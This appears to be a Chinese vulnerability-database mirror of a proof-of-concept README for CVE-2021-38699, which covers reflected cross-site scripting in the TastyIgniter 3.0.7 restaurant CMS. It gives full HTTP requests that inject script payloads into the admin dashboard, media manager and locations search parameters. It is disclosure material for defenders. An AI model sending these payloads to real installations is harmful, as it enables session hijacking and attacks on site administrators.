关联漏洞
标题:
Tastylgniter 跨站脚本漏洞
(CVE-2021-38699)
描述:TastyIgniter是一个基于Laravel PHP Framework的免费开源在线订购软件,旨在让开发者和餐馆老板享受生活。 Tastylgniter 3.0.7存在跨站脚本漏洞,该漏洞源于软件中的/account, /reservation, /admin/dashboard, 和/admin/system_logs目录中缺少对于用户提交数据的有效验证。
描述
Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurtant CMS
介绍
# CVE-2021-38699 : Multiple Reflected XSS in TastyIgniter v3.0.7 Restaurtant CMS
Authenticated reflected XSS exists in the TastyIgniter Admin dashboard in version 3.0.7.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38699
## POC:
### Admin dashboard start param:
```
POST http://cvefarm.local/admin/dashboard HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-IGNITER-REQUEST-HANDLER: charts::onFetchDatasets
X-CSRF-TOKEN: 37EWVV424abZPiH6H1L6CWZvTYhEfx3XK73Xa4A5
X-Requested-With: XMLHttpRequest
Content-Length: 81
Origin: https://cvefarm.local
Connection: keep-alive
Referer: https://cvefarm.local/admin/dashboard
Cookie: tastyigniter_session=[session/admin_session]
Host: cvefarm.local
start=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&end=2021-08-12T12%3A48%3A16.747Z
```
### Admin dashboard end param:
```
POST http://cvefarm.local/admin/dashboard HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-IGNITER-REQUEST-HANDLER: charts::onFetchDatasets
X-CSRF-TOKEN: 37EWVV424abZPiH6H1L6CWZvTYhEfx3XK73Xa4A5
X-Requested-With: XMLHttpRequest
Content-Length: 81
Origin: https://cvefarm.local
Connection: keep-alive
Referer: https://cvefarm.local/admin/dashboard
Cookie: tastyigniter_session=[session/admin_session]
Host: cvefarm.local
start=2021-07-14T12%3A48%3A16.746Z&end=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
```
## Media Manager path parameter
```
POST http://cvefarm.local/admin/media_manager HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-IGNITER-REQUEST-HANDLER: manager::onGoToFolder
X-CSRF-TOKEN: QVRktQkPLxizjY3vbMe2dQ5ZgZMfMalZYnQZzMes
X-Requested-With: XMLHttpRequest
Content-Length: 56
Origin: https://cvefarm.local
Connection: keep-alive
Referer: https://cvefarm.local/admin/media_manager
Cookie: tastyigniter_session=[session/admin_session]
Host: cvefarm.local
path=%22%3E%00%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
```
## Location parameter
```
GET http://cvefarm.local/locations?search=javascript%3Aalert%281%29%3B HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://cvefarm.local/locations
Cookie: tastyigniter_session=[session]
Host: cvefarm.local
```
## Other Images
## Discovery
August 2021
- Matt Kiely | HuskyHacks
- Justin White (https://github.com/Justin-1993/CVE-2021-38699 & https://pentesternotes.com/?p=209)
文件快照
[4.0K] /data/pocs/4ae61f25a59c7fdce3954779df4e54b03a06c7e9
└── [3.5K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。